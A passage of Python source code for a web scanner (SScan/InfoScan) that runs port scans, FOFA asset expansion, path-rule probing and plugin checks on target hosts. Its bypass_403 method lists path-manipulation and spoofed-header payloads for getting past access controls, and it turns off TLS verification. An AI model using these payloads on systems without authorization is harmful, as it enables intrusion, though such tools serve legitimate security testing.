def __init__(self, host=None, file=None, dire="", network=32, t=100, rule=None,
full=True, script=None, noscripts=False, crawl=True,
browser=True, script_only=False, checkcdn=True, fofa=True):
self.host = host
self.file = file
self.rule_files = []
self.script_files = []
self.dire = dire
self.network = network
self.t = t
self.rule = rule
self.crawl = crawl
self.checkcdn = checkcdn
self.fileull = full
self.scripts_only = script_only
self.script = script
self.no_scripts = noscripts
self.browser = browser
self.fofa = fofa
if self.file:
self.input_files = [self.file]
elif self.dire:
self.input_files = glob.glob(self.dire + '/*.txt')
elif self.host:
self.input_files = [self.host]
self.require_no_http = True # 所有插件都不依赖 HTTP 连接池
self.require_index_doc = False # 插件需要请求首页
self.require_ports = set() # 插件扫描所需端口
self.text_to_find, self.regex_to_find, self.text_to_exclude, self.regex_to_exclude, self.rules_set, self.rules_set_root_only = None, None, None, None, None, None
# 加载相关配置
def config_param(self):
"""
Config parameter
"""
if self.dire:
self.dire = glob.glob(self.dire + '/*.txt')
if self.rule is None:
self.rule_files = glob.glob('pocs/rules/*.txt')
else:
if isinstance(self.rule, str):
rule = self.rule.split()
else:
rule = self.rule
for rule_name in rule:
if not rule_name.endswith('.txt'):
rule_name += '.txt'
if not os.path.exists('pocs/rules/%s' % rule_name):
logger.log('FATAL', f'Rule file not found: {rule_name}')
exit(-1)
self.rule_files.append(f'pocs/rules/{rule_name}')
# 没有指定只使用脚本时
if not self.scripts_only:
self.text_to_find, self.regex_to_find, self.text_to_exclude, self.regex_to_exclude, self.rules_set, self.rules_set_root_only = read_rules(self.rule_files)
# 脚本使用时
if not self.no_scripts:
if self.script is None:
self.script_files = glob.glob('pocs/scripts/*.py')
else:
if isinstance(self.script, str):
script = self.script.split()
else:
script = self.script
for script_name in script:
if not script_name.lower().endswith('.py'):
script_name += '.py'
if not os.path.exists('pocs/scripts/%s' % script_name):
logger.log('FATAL', f'script file not found: {script_name}')
exit(-1)
self.script_files.append('pocs/scripts/%s' % script_name)
pattern = re.compile(r'ports_to_check.*?=(.*)')
for _script in self.script_files:
with open(_script, encoding='UTF-8', errors='ignore') as f:
content = f.read()
if content.find('self.http_request') >= 0 or content.find('self.session') >= 0:
self.require_no_http = False # 插件依赖HTTP连接池
if content.find('self.index_') >= 0:
self.require_no_http = False
self.require_index_doc = True
# 获取插件需要的端口
m = pattern.search(content)
if m:
m_str = m.group(1).strip()
if m_str.find('#') >= 0: # 去掉注释
m_str = m_str[:m_str.find('#')]
if m_str.find('[') < 0:
if int(m_str) not in self.require_ports:
self.require_ports.add(int(m_str))
else:
for port in eval(m_str):
if port not in self.require_ports:
self.require_ports.add(int(port))
# 检查命令行输入
def check_param(self):
"""
Check parameter
"""
if not (self.file or self.dire or self.host):
msg = '\nself missing! One of following self should be specified \n' \
' \t--f TargetFile \n' \
' \t--d TargetDirectory \n' \
' \t--host www.host1.com www.host2.com 8.8.8.8'
logger.log('FATAL', msg)
exit(-1)
if self.file and not os.path.isfile(self.file):
logger.log('FATAL', f'TargetFile not found: {self.file}')
exit(-1)
if self.dire and not os.path.isdir(self.dire):
logger.log('FATAL', f'TargetFile not found: {self.dire}')
exit(-1)
self.network = int(self.network)
if not (8 <= self.network <= 32):
logger.log('FATAL', f'Network should be an integer between 24 and 31')
exit(-1)
def main(self):
q_targets = multiprocessing.Manager().Queue() # targets Queue
q_targets_list = []
q_results = multiprocessing.Manager().Queue() # results Queue
fofa_result = multiprocessing.Manager().Queue() # results Queue
# 目标处理完成,扫描进程才可以开始退出
process_targets_done = multiprocessing.Value('i', 0)
for input_file in self.input_files:
# 读取目标
if self.host:
target_list = self.host.replace(',', ' ').strip().split()
elif self.file or self.dire:
with open(input_file, encoding='UTF-8', errors='ignore') as inFile:
target_list = list(set(inFile.readlines()))
try:
import threading
# 实时生成报告
target_count = len(target_list) # 目标数
# 生成报告,管理标准输出
threading.Thread(target=save_report, args=(self, q_results, input_file, target_count)).start()
clear_queue(q_results)
clear_queue(q_targets)
process_targets_done.value = 0
start_time = time.time()
p = multiprocessing.Process(
target=prepare_targets,
args=(target_list, q_targets, self, fofa_result))
p.daemon = True
p.start()
p.join() # join 是用来阻塞当前线程的,p.start()之后,p 就提示主进程,需要等待p结束才向下执行
time.sleep(1.0) # 让prepare_targets进程尽快开始执行
logger.log('INFOR', f'All preparations have been completed and it took %.1f seconds!' % (
time.time() - start_time))
# 根据电脑 CPU 的内核数量, 创建相应的进程池
# count = multiprocessing.cpu_count()
count = 30
# 少量目标,至多创建2倍扫描进程
if len(target_list) * 2 < count:
count = len(target_list) * 2
if self.fofa and fofa_result.qsize() > 0:
# fofa 搜索结果保存
save_fofa(self, fofa_result, input_file)
while True:
if not q_targets.empty():
q_targets_list.append(q_targets.get())
else:
break
# q_targets.get() {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '', 'ports_open': [80, 443], 'is_neighbor': 0}
progress = Progress(
"[progress.description]{task.description}",
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
"[bold green]{task.completed}/{task.total}",
transient=True, # 100%后隐藏进度条
)
with progress:
targets = []
for target in q_targets_list:
tmp = [target, q_results, self]
targets.append(tmp)
progress_bar = progress.add_task("[cyan]Leak detection...", total=len(targets), start=False)
with multiprocessing.Pool(processes=count) as pool:
results = pool.imap_unordered(scan_process, targets)
for result in results:
# progress.print(result)
progress.advance(progress_bar)
pool.close()
pool.join()
time.sleep(1.0) # 让prepare_targets进程尽快开始执行
cost_time = time.time() - start_time
cost_min = int(cost_time / 60)
cost_min = '%s min ' % cost_min if cost_min > 0 else ''
cost_seconds = '%.1f' % (cost_time % 60)
logger.log('INFOR', f'Scanned {len(q_targets_list)} targets in {cost_min}{cost_seconds} seconds.')
except Exception as e:
logger.log('FATAL', f'[__main__.exception] %s' % repr(e))
import traceback
logger.log('FATAL', traceback.format_exc())
setting.stop_me = True
def print(self):
"""
InfoScan running entrance
:return: All subdomain log
:rtype: list
"""
print(SScan_banner)
dt = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(f'[*] Starting InfoScan @ {dt}\n')
self.check_param()
self.config_param()
if self.fofa:
self.fofa = check_fofa()
# 获取高质量的代理ip
# checkProxyFile()
if self.no_scripts:
logger.log('INFOR', f'Scripts scan was disabled.')
if self.require_ports:
logger.log('INFOR', f'Scripts scan port check: %s' % ','.join([str(x) for x in self.require_ports]))
def run(self):
self.print()
self.main()
@staticmethod
def version():
"""
Print version information and exit
"""
print(SScan_banner)
exit(0)
if __name__ == '__main__':
# 优雅的使用 ctrl c 退出
signal.signal(signal.SIGINT, ctrl_quit)
signal.signal(signal.SIGTERM, ctrl_quit)
fire.Fire(SScan)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
from lib.config.log import logger
from urllib.parse import urlparse
from lib.common.scanner import Scanner
from lib.module.iscdn import check_cdn
from lib.module.fofa import Fofa
from lib.module.PortScan import PortScan
from lib.common.utils import add_ip
from lib.config.setting import web_ports
# 漏洞扫描
def scan_process(targets):
target, q_results, args = targets[0], targets[1], targets[2]
scanner = Scanner(args=args)
try:
'''
{'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '',
'ports_open': [443, 8088], 'script': True, 'has_http': True}
'''
# logger.log('INFOR', f'{target}')
# 处理目标信息,加载规则,脚本等等
ret = scanner.init_from_url(target)
if ret:
host, results = scanner.scan()
if results:
q_results.put((host, results))
except Exception as e:
logger.log('DEBUG', f'{e}')
finally:
return target
# 处理目标需要的80、443、指定端口、脚本端口
def get_host_port_list(queue_targets, args):
host_port_list = []
for _target in queue_targets:
url = _target
# scheme netloc path
if url.find('://') < 0:
scheme = 'unknown'
netloc = url[:url.find('/')] if url.find('/') > 0 else url
path = ''
else:
# scheme='http', netloc='www.baidu.com:80', path='', params='', query='', fragment=''
scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
# 指定端口时需要,检查指定的端口是否开放
if netloc.find(':') >= 0:
_ = netloc.split(':')
host = _[0]
http_port = int(_[1])
else:
host = netloc
http_port = None
if scheme == 'https' and http_port is None:
http_port = 443
elif scheme == 'http' and http_port is None:
http_port = 80
if scheme == 'unknown':
if http_port == 80:
scheme = 'http'
elif http_port == 443:
scheme = 'https'
# 只使用脚本时,不扫描指定、80、443端口
if not args.scripts_only:
# (host, port, scheme, path, port) 最后一位 port 是指当前目标web服务的端口,
# 通过检查该端口是否开放,来验证目标是否存在web服务,若存在则进行规则扫描
if http_port: # url中指定了端口
host_port_list.append((host, http_port, scheme, path, http_port))
else: # url中没指定扫描, 将要扫描的 web 端口 加进去
http_port = 80
for port in web_ports:
host_port_list.append((host, port, scheme, path, port))
# 没有禁用插件时,把插件中需要扫描的端口加进去
if not args.no_scripts:
for s_port in args.require_ports:
host_port_list.append((host, s_port, scheme, path, http_port))
return host_port_list
# 对目标进行封装,格式化
# {'127.0.0.1': {'scheme': 'http', 'host': '127.0.0.1', 'port': 80, 'path': '', 'ports_open': [80, 3306], 'script': True}
def get_target(ps_result, q_fofa):
targets = {}
for target in ps_result:
# target: ('127.0.0.1', 8001, 'open', 'unknown', '', 80)
if target[2] == 'open':
host = target[0]
scheme = target[3]
path = target[4]
if host in targets:
ports_open = targets[host]['ports_open']
port = target[1]
if port not in ports_open:
ports_open.append(port)
targets[host].update(ports_open=ports_open)
else:
targets[host] = {'scheme': scheme, 'host': host, 'port': target[5], 'path': path, 'ports_open': [target[1]], 'script': True}
if q_fofa:
# 处理 fofa 的结果
for _target in q_fofa:
url = _target[0]
# scheme='http', netloc='www.baidu.com:80', path='', params='', query='', fragment=''
scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
host_port = netloc.split(':')
host = host_port[0]
if len(host_port) == 2:
port = int(host_port[1])
else:
port = 80
if host in targets.keys() and (port == 80 or port == 443):
pass
else:
# fofa搜索的结果host是否已存在目标中,若存在的话,给个标记,不再进行脚本探测
if host in targets.keys():
fofa_target = {'scheme': scheme, 'host': netloc, 'port': port, 'path': path, 'ports_open': [port], 'script': False}
else:
fofa_target = {'scheme': scheme, 'host': netloc, 'port': port, 'path': path, 'ports_open': [port], 'script': True}
targets[netloc] = fofa_target
return targets
# 使用异步协程, 检测目标80、443、给定端口是否开放
def process_targets(queue_targets, q_targets, args, q_fofa):
# 对目标和要扫描的端口做处理,格式化
# queue_targets ['http://127.0.0.1:8080', 'www.baidu.cn']
# host_port_list [('127.0.0.1', 8080, 'http', '/', 8080), ('www.baidu.cn', 80, 'unknown', '/', 80), ('www.baidu.cn', 443, 'unknown', '/', 443)]
host_port_list = get_host_port_list(queue_targets, args)
# 使用协程进行端口扫描
ps = PortScan(host_port_list, 2000)
# ps_result {'127.0.0.1': [80], '127.0.0.1': [443, 80]}
ps_result = ps.async_tcp_port_scan()
# logger.log('INFOR', f'ps_result: {ps_result}')
# 对目标进行封装,格式化
targets = get_target(ps_result, q_fofa)
for host in targets:
target = targets[host]
ports_open = target['ports_open']
if 80 in ports_open and 443 in ports_open:
target.update(port=443)
target.update(scheme='https')
elif 80 in ports_open:
target.update(port=80)
target.update(scheme='http')
elif 443 in ports_open:
target.update(port=443)
target.update(scheme='https')
if target['port'] in ports_open or 80 in ports_open or 443 in ports_open:
target['has_http'] = True
else:
target['has_http'] = False
# 添加目标,最终的扫描目标
# {'scheme': 'http', 'host':'127.0.0.1', 'port': 8088, 'path':'/', 'ports_open': [8088], 'script': True,'has_http': True}
q_targets.put(target)
def prepare_targets(targets, q_targets, args, fofa_result):
# 筛选有效目标、url解析、检查是否存在cdn
# todo queue_targets 没有进行去重、当['127.0.0.1', 'http://127.0.0.1'] ,存在重复
# queue_targets 有效的目标加上解析出的ip, valid_targets 有效的目标, 供fofa检测使用
queue_targets, valid_targets = check_cdn(targets, args)
# fofa 扫到的并且存活的web资产
q_fofa = []
# 当配置 fofa api 时, 对 valid_targets 目标进行fofa搜索,扩大资产范围
if args.fofa and valid_targets:
fofa = Fofa(valid_targets, fofa_result)
q_fofa = fofa.run()
# exit()
# 筛选目标中的ip, 当指定其它掩码时,根据该ip添加目标(当目标存在cdn时不会添加该段的其它目标)
ip_subnet = add_ip(args, queue_targets)
# 目标合并, 去重
queue_targets.extend(ip_subnet)
queue_targets = list(set(queue_targets))
# q_fofa [('http://127.0.0.1:3790', '403 Forbidden'), ('http://127.0.0.1', 'Welcome to CentOS')]
# 使用异步协程, 检测目标80、443、给定端口是否开放
# 检测目标的80、443、给定端口是否开放,并格式化,加入扫描队列 q_targets
process_targets(queue_targets, q_targets, args, q_fofa)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import requests
from requests.adapters import HTTPAdapter
from lib.config import setting
# 禁用安全请求警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
'''
连接池
HTTP是建立在TCP上面的,一次HTTP请求要经历TCP三次握手阶段,
然后发送请求,得到相应,最后TCP断开连接。如果我们要发出多个HTTP请求,
每次都这么搞,那每次要握手、请求、断开,就太浪费了,如果是HTTPS请求,就更加浪费了,
每次HTTPS请求之前的连接多好几个包(不包括ACK的话会多4个)。
所以如果我们在TCP或HTTP连接建立之后,可以传输、传输、传输,就能省很多资源。
于是就有了“HTTP(S)连接池”的概念。
'''
def conn_pool():
session = requests.Session()
session.keep_alive = False
session.headers = setting.default_headers
# 创建一个适配器,连接池的数量pool_connections, 最大数量pool_maxsize, 失败重试的次数max_retries
'''
pool_connections – 缓存连接 缓存的 urllib3 连接池个数, 指定的不是连接的数量,而是连接池的数量,一般默认的10就够用了。
pool_maxsize – 指定的才是每个pool中最大连接数量
max_retries (int) – 每次连接的最大失败重试次数,只用于 DNS 查询失败,socket 连接或连接超时,
默认情况下
Requests 不会重试失败的连接,如果你需要对请求重试的条件进行细粒度的控制,可以引入 urllib3 的 Retry 类
pool_block – 连接池是否应该为连接阻塞
'''
adapter = HTTPAdapter(pool_connections=10, pool_maxsize=100, pool_block=False)
# 告诉requests,http协议和https协议都使用这个适配器
session.mount('http://', adapter)
session.mount('https://', adapter)
# 设置为False, 主要是HTTPS时会报错
session.verify = False
# 禁止使用环境系统代理
session.trust_env = False
return session
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import requests
import asyncio
from concurrent.futures import ThreadPoolExecutor
# 禁用安全请求警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import importlib
from yarl import URL
import traceback
import re
import time
import os
from bs4 import BeautifulSoup
from lib.config.log import logger
from lib.common.utils import get_domain_sub, cal_depth, get_html
from lib.config.setting import proxyList, default_headers
from lib.common.connectionPool import conn_pool
class Scanner(object):
def __init__(self, args):
self.args = args
self.start_time = time.time()
self.time_flag = True
self.links_limit = 100 # max number of folders to scan
self._init_rules()
self._init_scripts()
self.timeout = 30 * 60 # 每个目标的最大扫描分钟,默认为10分钟,
self.session = conn_pool() # 使用连接池
self.url_list = list() # all urls to scan 任务处理队列
self.urls_processed = set() # processed urls
self.urls_enqueued = set() # entered queue urls
self.urls_crawled = set()
self._302_url = set() # 302 跳转后,页面符合黑名单规则的
self._403_url = [] # 403 url 的 返回包
self.results = {}
self._404_status = -1
self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
self.scheme, self.host, self.port, self.path = None, None, None, None
self.domain_sub = ''
self.base_url = ''
self.max_depth = 0
self.len_404_doc = 0
self.has_http = None
self.script = None
self.ports_open = None
self.ports_closed = None
self.no_scripts = None
self.status_502_count = 0
self.flag = False
self.check = True # 当页面502 时,标记为False,不再检查
def reset_scanner(self):
self.start_time = time.time()
self.url_list.clear()
self.urls_processed.clear()
self.urls_enqueued.clear()
self.urls_crawled.clear()
self.results.clear()
self._404_status = -1
self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
self.scheme, self.host, self.port, self.path = None, None, None, None
self.domain_sub = ''
self.base_url = ''
self.status_502_count = 0
# scan from a given URL
'''
{'scheme': 'http', 'host': '127.0.0.1', 'port': 8088, 'path': '/', 'ports_open':[8088], 'script': True, 'has_http': True}
'''
def init_from_url(self, target):
self.reset_scanner()
self.scheme = target['scheme']
self.host = target['host']
self.port = target['port']
self.path = target['path']
self.has_http = target['has_http']
self.script = target['script']
self.ports_open = target['ports_open']
self.domain_sub = get_domain_sub(self.host) # baidu.com >> baidu
self.init_final()
return True
def init_final(self):
if self.scheme == 'http' and self.port == 80 or self.scheme == 'https' and self.port == 443:
self.base_url = f'{self.scheme}://{self.host}'
elif self.scheme != 'unknown' and self.host.find(':') >= 0:
self.base_url = f'{self.scheme}://{self.host}'
else:
self.base_url = f'{self.scheme}://{self.host}:{self.port}'
if not self.has_http:
logger.log('DEBUG', f'NO_HTTP_Scan %s:%s' % (self.host, self.port) if self.port else 'Scan %s' % self.host)
# 脚本
if self.script:
for _ in self.user_scripts:
self.url_list.append((_, '/'))
if not self.has_http or self.args.scripts_only: # 未发现HTTP服务 或 只依赖插件扫描
return
# todo 当url 类似 http://www.example.com , path:'' , max_depth = 1+5=6
self.max_depth = cal_depth(self, self.path)[1] + 5
self.check_404_existence()
if self._404_status == -1:
logger.log('DEBUG', f'HTTP 404 check failed %s' % self.base_url)
elif self._404_status != 404:
logger.log('DEBUG', f'%s has no HTTP 404. {self._404_status}' % self.base_url)
_path, _depth = cal_depth(self, self.path)
# 加入队列
self.enqueue('/')
# 进行http请求
def http_request(self, url, timeout=10):
try:
if not url:
url = '/'
if not self.session:
return -1, {}, ''
# 使用代理,但是代理效果不是很好,这里就不使用了
# self.session.proxies = random.choice(proxyList)
#
# self.session.proxies = {
# "https": "https://127.0.0.1:8080",
# "http": "http://127.0.0.1:8080"
# }
resp = self.session.get(self.base_url + url, allow_redirects=False, headers=default_headers, timeout=timeout)
headers = resp.headers
status = resp.status_code
# 502出现3次以上,排除该站点
if status == 502:
self.status_502_count += 1
if self.status_502_count > 3:
self.url_list.clear()
try:
if self.session:
self.session.close()
except Exception as e:
logger.log('DEBUG', f'{str(e)}')
pass
self.session = None
# 301 永久移动时,重新获取response
if status == 301:
target = headers.get('Location')
if not target.startswith('/file:'):
try:
resp = self.session.get(URL(target, encoded=True), headers=default_headers, allow_redirects=False, timeout=timeout, verify=False)
headers = resp.headers
except Exception as e:
logger.log('DEBUG', f'{e}, {target} {self.base_url + url}')
pass
# 前面禁止重定向, 但有时,网页重定向后才会有东西
if status == 302:
new_url = headers["Location"]
if new_url not in self._302_url:
resp = self.session.get(URL(new_url, encoded=True), headers=default_headers, timeout=timeout, verify=False)
headers = resp.headers
self._302_url.add(new_url)
html_doc = get_html(headers, resp)
# 页面不在黑名单规则里面时, 403 返回包 记录,扫描完成后计算大小,然后再判断是否进行403绕过
# 若 403 返回包 的最终个数小于20,则不进行绕过测试,认为是一种网站防扫描措施
if not self.find_exclude_text(html_doc) and status == 403:
self._403_url.append(url)
logger.log('DEBUG', f'{self.base_url + url} status: {status}')
return status, headers, html_doc
except requests.exceptions.RetryError as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
return -1, {}, ''
except requests.exceptions.ReadTimeout as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
return -1, {}, ''
except requests.exceptions.ConnectionError as e:
logger.log('DEBUG', f'IP可能被封了 {str(e)} {self.base_url + url}')
return -1, {}, ''
except TypeError as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
return -1, {}, ''
except Exception as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
logger.log('DEBUG', f'{traceback.format_exc()}')
return -1, {}, ''
def bypass_403(self, url_403, timeout=5):
try:
resp = self.session.get(self.base_url + url_403, allow_redirects=False, headers=default_headers,
timeout=timeout)
OriginalUrl = url_403
Rurl = url_403
if OriginalUrl == "/test-scan-404-existence-check":
return
if Rurl != "/":
Rurl = url_403.rstrip("/")
PreviousPath = '/'.join(str(Rurl).split('/')[:-1])
LastPath = str(Rurl).split('/')[-1]
payloads = ["%2e/" + LastPath, "%2f/" + LastPath, LastPath + "/.", LastPath + "/./.",
LastPath + "/././", LastPath + "/./", "./" + LastPath + "/./", LastPath + "%20/",
LastPath + "%09/", "%20" + LastPath + "%20/", LastPath + "/..;/", LastPath + "..;/",
LastPath + "?", LastPath + "??", LastPath + "???", LastPath + "//", LastPath + "/*",
LastPath + "/*/", "/" + LastPath + "//", LastPath + "/", LastPath + "/.randomstring"]
for p in payloads:
url = PreviousPath + "/" + p
resp_p = self.session.get(self.base_url + url, allow_redirects=False, headers=default_headers,
timeout=timeout)
# 当状态码为200时,且该页面的 Content-Length 不与首页相等时,认为可以绕过403
if resp_p.status_code == 200 and resp_p.headers.get('Content-Length') != resp.headers.get('Content-Length'):
if OriginalUrl not in self.results:
self.results[OriginalUrl] = []
_ = {'status': resp_p.status_code, 'url': '%s%s' % (self.base_url, OriginalUrl),
'title': f'绕过payload: {self.base_url}{url}', 'vul_type': "403绕过"}
if _ not in self.results[OriginalUrl]:
self.results[OriginalUrl].append(_)
break
hpayloads = [{"X-Rewrite-URL": OriginalUrl}, {"X-Original-URL": OriginalUrl}, {"Referer": "/" + LastPath},
{"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Originating-IP": "127.0.0.1"},
{"X-Forwarded-For": "127.0.0.1"}, {"X-Remote-IP": "127.0.0.1"},
{"X-Client-IP": "127.0.0.1"}, {"X-Host": "127.0.0.1"}, {"X-Forwarded-Host": "127.0.0.1"}]
for hp in hpayloads:
# 这个headers 是为了防止update时,连续添加入字典,不能使用default_headers,不然会连续增加,default_headers会发生变化
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
"Connection": "close",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
}
key, = hp
value, = hp.values()
new_url = ""
if key == "X-Original-URL":
new_url = Rurl + "4nyth1ng"
if key == "X-Rewrite-URL":
new_url = "/"
# Add header
headers.update(hp)
if new_url:
url = new_url
else:
url = OriginalUrl
resp_hp = self.session.get(self.base_url + url, allow_redirects=False, headers=headers, timeout=timeout)
# 当状态码为200时,且该页面的 Content-Length 不与首页相等时,认为可以绕过403
if resp_hp.status_code == 200 and resp_hp.headers.get('Content-Length') != resp.headers.get(
'Content-Length'):
if OriginalUrl not in self.results:
self.results[OriginalUrl] = []
_ = {'status': resp.status_code, 'url': '%s%s' % (self.base_url, OriginalUrl),
'title': f'绕过payload: {self.base_url}{url}, Header payload: {key}: {value}',
'vul_type': "403绕过"}
if _ not in self.results[OriginalUrl]:
self.results[OriginalUrl].append(_)
break
except Exception:
pass
# 检查状态404是否存在
def check_404_existence(self):
try:
try:
self._404_status, _, html_doc = self.http_request('/test-scan-404-existence-check')
except Exception as e:
logger.log('DEBUG', f'HTTP 404 check failed: {self.base_url} {str(e)}')
self._404_status, _, html_doc = -1, {}, ''
if self._404_status != 404:
self.len_404_doc = len(html_doc)
except Exception as e:
logger.log('DEBUG', f'[Check_404] Exception {self.base_url} {str(e)}')
# 将检查完的 path 加入队列,加载规则和脚本
def enqueue(self, path):
try:
path = str(path)
except Exception as e:
logger.log('DEBUG', f'{str(e)}')
return False
try:
# BBScan 中 当 path 中存在数字时,将url中的数字替换成 {num} /asdas12asd >> /asdas{num}asd
# todo 看不懂在干嘛
# url_pattern = re.sub(r'\d+', '{num}', path)
url_pattern = path
if url_pattern in self.urls_processed or len(self.urls_processed) >= self.links_limit:
return False
self.urls_processed.add(url_pattern)
if self.args.crawl: # 爬取网站的 a 标签
self.crawl(path)
else:
self.index_status, self.index_headers, self.index_html_doc = self.http_request('/')
if self._404_status != -1: # valid web service
# 网站主目录下扫描全部rule, 即rule和root_only标记的rule, 其他目录下扫描 只扫描rule
rule_set_to_process = [self.rules_set, self.rules_set_root_only] if path == '/' else [self.rules_set]
# 加载规则
for rule_set in rule_set_to_process:
for _ in rule_set:
# _ ('/scripts/samples', 'IIS', 200, '', '', True, 'iis')
try:
full_url = path.rstrip('/') + _[0]
except Exception as e:
logger.log('DEBUG', f'{str(e)}')
continue
if full_url in self.urls_enqueued:
continue
url_description = {'prefix': path.rstrip('/'), 'full_url': full_url}
item = (url_description, _[1], _[2], _[3], _[4], _[5], _[6])
self.url_list.append(item)
self.urls_enqueued.add(full_url)
# 本来若只找到 /asdd/asd/ 这种链接,没有/asdd/ 这个子目录,会将/asdd/子目录添加进去处理
if path.count('/') >= 2:
self.enqueue('/'.join(path.split('/')[:-2]) + '/') # sub folder enqueue
if path != '/' and not self.no_scripts:
for script in self.user_scripts:
self.url_list.append((script, path))
return True
except Exception as e:
logger.log('ERROR', f'[_enqueue.exception] %s' % str(e))
logger.log('DEBUG', f'{traceback.format_exc()}')
return False
# 在页面中匹配rules的白名单规则
def find_text(self, html_doc):
for _text in self.text_to_find:
if html_doc.find(_text) >= 0:
return True, 'Found [%s]' % _text
for _regex in self.regex_to_find:
if _regex.search(html_doc):
return True, 'Found Regex [%s]' % _regex.pattern
return False
# 匹配黑名单规则
def find_exclude_text(self, html_doc):
for _text in self.text_to_exclude:
if html_doc.find(_text) >= 0:
return True
for _regex in self.regex_to_exclude:
if _regex.search(html_doc):
return True
return False
# 循环爬取页面的超链接,放入队列self.enqueue(), 匹配rules的白名单规则
def crawl(self, path, do_not_process_links=False):
try:
status, headers, html_doc = self.http_request(path)
if path == '/':
self.index_status, self.index_headers, self.index_html_doc = status, headers, html_doc
if self.args.crawl and not do_not_process_links and html_doc:
soup = BeautifulSoup(html_doc, "html.parser")
# 循环爬取a标签
for link in soup.find_all('a'):
url = link.get('href', '').strip()
if url.startswith('..'):
continue
if not url.startswith('/') and url.find('//') < 0: # 相对路径
url = path + url
url, depth = cal_depth(self, url)
if depth <= self.max_depth:
self.enqueue(url)
# 匹配rules的白名单规则
ret = self.find_text(html_doc)
if ret:
if '/' not in self.results:
self.results['/'] = []
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
_ = {'status': status, 'url': '%s%s' % (self.base_url, path), 'title': title, 'vul_type': ret[1]}
if _ not in self.results['/']:
self.results['/'].append(_)
except Exception as e:
logger.log('ERROR', f'[crawl Exception] %s %s' % (path, str(e)))
# 读取rules目录下的相关规则
def _init_rules(self):
self.text_to_find = self.args.text_to_find
self.regex_to_find = self.args.regex_to_find
self.text_to_exclude = self.args.text_to_exclude
self.regex_to_exclude = self.args.regex_to_exclude
self.rules_set = self.args.rules_set
self.rules_set_root_only = self.args.rules_set_root_only
def _init_scripts(self):
self.user_scripts = []
if self.args.no_scripts: # 全局禁用插件,无需导入
return
for _script in self.args.script_files:
# 跳过__init__.py
if '_init_' in _script:
continue
script_name_origin = os.path.basename(_script)
script_name = script_name_origin.replace('.py', '')
try:
self.user_scripts.append(importlib.import_module('pocs.scripts.%s' % script_name))
except Exception as e:
logger.log('ERROR', f'Fail to load script %s, {e}' % script_name)
def scan_worker(self, item):
if not self.flag and time.time() - self.start_time > self.timeout:
self.flag = True
if self.flag:
self.url_list.clear()
# self.flag = False
logger.log('ERROR', f'Timed out task: %s' % self.base_url)
return
url, url_description, tag, status_to_match, content_type, content_type_no, root_only, vul_type, prefix = None, None, None, None, None, None, None, None, None
try:
if len(item) == 2: # Script Scan
check_func = getattr(item[0], 'do_check')
check_func(self, item[1])
else:
# ({'prefix': '', 'full_url': '/trace'}, 'Spring boot serverProperties', 200, '', '', True, 'springboot')
url_description, tag, status_to_match, content_type, content_type_no, root_only, vul_type = item
prefix = url_description['prefix']
url = url_description['full_url']
'''
{sub} 这个是规则里设置的, 主要是根据当前域名来做字典,
比如{sub}.sql ,当前域名为baidu.com ,则规则改为 baidu.sql
'''
if url.find('{sub}') >= 0:
if not self.domain_sub:
return
url = url.replace('{sub}', self.domain_sub)
except Exception as e:
logger.log('ERROR', f'[scan_worker.1][%s %s] {e}' % (item[0], item[1]))
return
if not item or not url:
return
# 开始规则目录探测
try:
status, headers, html_doc = self.http_request(url)
cur_content_type = headers.get('content-type', '')
cur_content_length = headers.get('content-length', len(html_doc))
if self.find_exclude_text(html_doc): # 黑名单规则排除
return
if 0 <= int(cur_content_length) <= 10: # text too short
return
if cur_content_type.find('image/') >= 0: # exclude image
return
# 当指定 content_type 时,
if content_type and content_type != 'json' and cur_content_type.find('json') >= 0:
return
# content type mismatch
if (content_type and cur_content_type.find(content_type) < 0) or (
content_type_no and cur_content_type.find(content_type_no) >= 0):
return
if tag and html_doc.find(tag) < 0:
return # tag mismatch
# 在页面中匹配rules的白名单规则
if self.find_text(html_doc) and status == 200:
valid_item = True
else:
# status code check
if status_to_match == 206 and status != 206:
return
if status_to_match in (200, 206) and status in (200, 206):
valid_item = True
elif status_to_match and status != status_to_match:
return
elif status in (403, 404) and status != status_to_match:
return
else:
valid_item = True
if status == self._404_status and url != '/':
len_doc = len(html_doc)
len_sum = self.len_404_doc + len_doc
if len_sum == 0 or (0.4 <= float(len_doc) / len_sum <= 0.6):
return
if valid_item:
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
if prefix not in self.results:
self.results[prefix] = []
_ = {'status': status, 'url': '%s%s' % (self.base_url, url), 'title': title, 'vul_type': vul_type}
if _ not in self.results[prefix]:
self.results[prefix].append(_)
except Exception:
logger.log('ERROR', f'[scan_worker.2][%s%s]' % (self.base_url, url))
logger.log('DEBUG', f'{traceback.format_exc()}')
# 使用多线程对目标进行扫描
def scan(self):
try:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
import platform
if platform.system() != "Windows":
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
